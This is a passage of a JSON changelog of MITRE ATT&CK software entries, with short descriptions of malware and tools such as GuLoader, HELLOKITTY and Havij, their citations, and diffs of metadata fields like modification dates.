Nokki Oct 2018", + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Final1stspy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:16.040000+00:00\", \"old_value\": \"2025-04-16 20:38:28.188000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--592260fb-dd5c-4a30-8d99-106a0485be0d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-03-25 14:58:24.832000+00:00", + "modified": "2025-04-25 19:04:04.232000+00:00", + "name": "Flagpro", + "description": "[Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0696", + "external_id": "S0696" + }, + { + "source_name": "NTT Security Flagpro new December 2021", + "description": "Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.", + "url": "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Flagpro" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:04:04.232000+00:00\", \"old_value\": \"2024-09-04 21:39:21.144000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:23.318000+00:00", + "name": "Forfiles", + "description": "[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0193", + "external_id": "S0193" + }, + { + "source_name": "Microsoft Forfiles Aug 2016", + "description": "Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:23.318000+00:00\", \"old_value\": \"2025-04-16 20:38:54.018000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-08 14:55:46.094000+00:00", + "modified": "2025-04-25 14:42:47.607000+00:00", + "name": "FrameworkPOS", + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0503", + "external_id": "S0503" + }, + { + "source_name": "Trinity", + "description": "(Citation: SentinelOne FrameworkPOS September 2019)" + }, + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FrameworkPOS", + "Trinity" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:47.607000+00:00\", \"old_value\": \"2025-04-16 20:37:57.360000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--04fc1842-f9e4-47cf-8cb8-5c61becad142", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-11 17:29:20.165000+00:00", + "modified": "2025-04-25 14:42:33.402000+00:00", + "name": "GRIFFON", + "description": "[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0417", + "external_id": "S0417" + }, + { + "source_name": "SecureList Griffon May 2019", + "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities. Retrieved October 11, 2019.", + "url": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GRIFFON" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:33.402000+00:00\", \"old_value\": \"2025-04-16 20:37:52.695000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--199463de-d9be-46d6-bb41-07234c1dd5a6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:36.177000+00:00", + "modified": "2025-04-25 14:42:46.881000+00:00", + "name": "GeminiDuke", + "description": "[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0049", + "external_id": "S0049" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GeminiDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:46.881000+00:00\", \"old_value\": \"2025-04-16 20:37:57.198000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-29 20:32:42.686000+00:00", + "modified": "2025-04-25 14:42:37.942000+00:00", + "name": "Get2", + "description": "[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0460", + "external_id": "S0460" + }, + { + "source_name": "Proofpoint TA505 October 2019", + "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.", + "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Get2" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:37.942000+00:00\", \"old_value\": \"2025-04-16 20:37:54.423000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--45c759ac-b490-48bb-80d4-c8eee3431027", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-11 20:49:20.832000+00:00", + "modified": "2025-04-25 14:43:09.227000+00:00", + "name": "GuLoader", + "description": "[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0561", + "external_id": "S0561" + }, + { + "source_name": "Unit 42 NETWIRE April 2020", + "description": "Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.", + "url": "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/" + }, + { + "source_name": "Medium Eli Salem GuLoader April 2021", + "description": "Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.", + "url": "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GuLoader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Eli Salem, @elisalem9" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:09.227000+00:00\", \"old_value\": \"2025-04-16 20:38:04.665000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--f8dfbc54-b070-4224-b560-79aaa5f835bd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:15.910000+00:00", + "modified": "2025-04-25 14:45:07.358000+00:00", + "name": "H1N1", + "description": "[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0132", + "external_id": "S0132" + }, + { + "source_name": "Cisco H1N1 Part 1", + "description": "Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.", + "url": "http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "H1N1" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:07.358000+00:00\", \"old_value\": \"2025-04-16 20:38:44.456000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:42:41.277000+00:00", + "name": "HALFBAKED", + "description": "[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0151", + "external_id": "S0151" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:41.277000+00:00\", \"old_value\": \"2025-04-16 20:37:55.633000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:34.161000+00:00", + "name": "HARDRAIN", + "description": "[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0246", + "external_id": "S0246" + }, + { + "source_name": "HARDRAIN", + "description": "(Citation: US-CERT HARDRAIN March 2018)" + }, + { + "source_name": "US-CERT HARDRAIN March 2018", + "description": "US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.", + "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HARDRAIN" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:34.161000+00:00\", \"old_value\": \"2025-04-16 20:38:33.134000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5d11d418-95dd-4377-b782-23160dfa17b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-03 20:07:21.788000+00:00", + "modified": "2025-04-25 14:43:30.306000+00:00", + "name": "HELLOKITTY", + "description": "[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0617", + "external_id": "S0617" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HELLOKITTY" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:30.306000+00:00\", \"old_value\": \"2025-04-16 20:38:11.555000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:46.445000+00:00", + "modified": "2025-04-25 14:44:53.772000+00:00", + "name": "HTTPBrowser", + "description": "[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0070", + "external_id": "S0070" + }, + { + "source_name": "HttpDump", + "description": "(Citation: ThreatConnect Anthem)" + }, + { + "source_name": "ThreatStream Evasion Analysis", + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.", + "url": "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "ThreatConnect Anthem", + "description": "ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.", + "url": "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HTTPBrowser", + "Token Control", + "HttpDump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:53.772000+00:00\", \"old_value\": \"2025-04-16 20:38:39.195000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4b62ab58-c23b-4704-9c15-edd568cd59f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:35.389000+00:00", + "modified": "2025-04-25 14:43:13.563000+00:00", + "name": "Hacking Team UEFI Rootkit", + "description": "[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0047", + "external_id": "S0047" + }, + { + "source_name": "TrendMicro Hacking Team UEFI", + "description": "Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Hacking Team UEFI Rootkit" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:13.563000+00:00\", \"old_value\": \"2025-04-16 20:38:05.792000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-08-12 19:32:56.301000+00:00", + "modified": "2025-04-25 14:45:01.455000+00:00", + "name": "Hancitor", + "description": "[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0499", + "external_id": "S0499" + }, + { + "source_name": "Chanitor", + "description": "(Citation: FireEye Hancitor)" + }, + { + "source_name": "Threatpost Hancitor", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/" + }, + { + "source_name": "FireEye Hancitor", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Hancitor", + "Chanitor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:01.455000+00:00\", \"old_value\": \"2025-04-16 20:38:42.270000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:31.679000+00:00", + "name": "Havij", + "description": "[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0224", + "external_id": "S0224" + }, + { + "source_name": "Check Point Havij Analysis", + "description": "Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.", + "url": "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:31.679000+00:00\", \"old_value\": \"2025-04-16 20:38:57.107000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2cf7dec3-66fc-423f-b2c7-58f1de243b4e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-02 20:48:23.462000+00:00", + "modified": "2025-04-25 14:42:55.977000+00:00", + "name": "HyperStack", + "description": "[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0537", + "external_id": "S0537" + }, + { + "source_name": "Accenture HyperStack October 2020", + "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HyperStack" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": 